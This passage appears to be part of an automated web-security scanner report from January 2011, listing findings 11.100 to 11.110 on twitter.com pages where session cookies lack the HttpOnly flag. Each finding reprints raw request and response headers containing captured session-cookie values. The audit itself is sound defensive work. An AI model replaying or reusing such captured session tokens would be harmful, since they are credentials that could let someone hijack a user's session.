X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.100. http://twitter.com/j_hollender

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /j_hollender

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j_hollender HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225016-34363-18254
ETag: "ff41031bc88714d0c96acba56a4b58e3"
Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT
X-Runtime: 0.01703
Content-Type: text/html; charset=utf-8
Content-Length: 50673
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.101. http://twitter.com/j_hollender/status/28168027493105664

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /j_hollender/status/28168027493105664

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j_hollender/status/28168027493105664 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:19 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225019-47017-40660
ETag: "f40d96b3c19b236169916ec226be14ef"
Last-Modified: Fri, 28 Jan 2011 14:30:19 GMT
X-Runtime: 0.05160
Content-Type: text/html; charset=utf-8
Content-Length: 13838
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20val9ob2xsZW5k%250AZXIvc3RhdHVzLzI4MTY4MDI3NDkzMTA1NjY0Ogxjc3JmX2lkIiU5OTJjOGJk%250AOGYzZTA0NDA4Y2Q1Y2MwMTkzZTZhMTliZjoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAToHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsA--3734fcc51205696679bb42e413a9322e748617b9; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.102. http://twitter.com/j_hollender/status/28175738595180544

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /j_hollender/status/28175738595180544

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j_hollender/status/28175738595180544 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225018-12254-34367
ETag: "61544e0c3acbf3bd257ae209a889c048"
Last-Modified: Fri, 28 Jan 2011 14:30:18 GMT
X-Runtime: 0.04377
Content-Type: text/html; charset=utf-8
Content-Length: 13823
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20val9ob2xsZW5k%250AZXIvc3RhdHVzLzI4MTc1NzM4NTk1MTgwNTQ0Ogxjc3JmX2lkIiU2ZGExNWUw%250AMGMyZWNjNjJjMzIzODFhMjU5NmZkNTkzZjoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAToHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsA--49158f0023a784432eb325042f2a8c5b699ba833; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.103. http://twitter.com/j_hollender/status/28205461161377793

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /j_hollender/status/28205461161377793

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j_hollender/status/28205461161377793 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225018-25935-2577
ETag: "005ad16ba87e94e3722ccf310c3a3b93"
Last-Modified: Fri, 28 Jan 2011 14:30:18 GMT
X-Runtime: 0.04800
Content-Type: text/html; charset=utf-8
Content-Length: 13823
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20val9ob2xsZW5k%250AZXIvc3RhdHVzLzI4MjA1NDYxMTYxMzc3NzkzOgxjc3JmX2lkIiUyZmUyZWVl%250AMjgwOTk4NGY3OWE1Y2JiZTJlZjVkMWFmNzoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAToHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsA--8142c62a123829501cbddbd07b967c4cb31b12ef; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.104. http://twitter.com/jayleno

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /jayleno

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jayleno HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265975-96833-20443
ETag: "f04375a0a64efa284a42025451fab18b"
Last-Modified: Sat, 29 Jan 2011 01:52:55 GMT
X-Runtime: 0.01621
Content-Type: text/html; charset=utf-8
Content-Length: 52179
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.105. http://twitter.com/jbchang

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /jbchang

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jbchang HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:50:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265833-44616-32351
ETag: "48cc8fb365481ae35c75282f1de941fe"
Last-Modified: Sat, 29 Jan 2011 01:50:33 GMT
X-Runtime: 0.02514
Content-Type: text/html; charset=utf-8
Content-Length: 50548
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.106. http://twitter.com/jobs

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /jobs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jobs HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:19 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225079-13629-5258
ETag: "24f2b3be58ffd35c950d79aa330616fd"
Last-Modified: Fri, 28 Jan 2011 14:31:19 GMT
X-Runtime: 0.03334
Content-Type: text/html; charset=utf-8
Content-Length: 18757
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlZDAwNDA4YmY4ZmE2OWEzNWU4MmQ0MDg5OTkxYmEz%250AMTU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--b979158e747a489fb5b4a97a6e15537893f77f1a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.107. http://twitter.com/joedwinell/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /joedwinell/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /joedwinell/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265290-93276-31294
ETag: "17022c0def3fb9af583820ad4dacfa32"
Last-Modified: Sat, 29 Jan 2011 01:41:30 GMT
X-Runtime: 0.00712
Content-Type: text/html; charset=utf-8
Content-Length: 52042
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.108. http://twitter.com/joemccann

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /joemccann

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /joemccann HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225039-24458-21657
ETag: "2185bda414323413d07c805828e8deaa"
Last-Modified: Fri, 28 Jan 2011 14:30:39 GMT
X-Runtime: 0.01186
Content-Type: text/html; charset=utf-8
Content-Length: 50599
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.109. http://twitter.com/jordanknight

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /jordanknight

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jordanknight HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265969-53407-37171
ETag: "a1dbaefbdb244bad17317656f8f51eb0"
Last-Modified: Sat, 29 Jan 2011 01:52:49 GMT
X-Runtime: 0.01240
Content-Type: text/html; charset=utf-8
Content-Length: 47864
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.110. http://twitter.com/kennychesney

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /kennychesney

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kennychesney HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
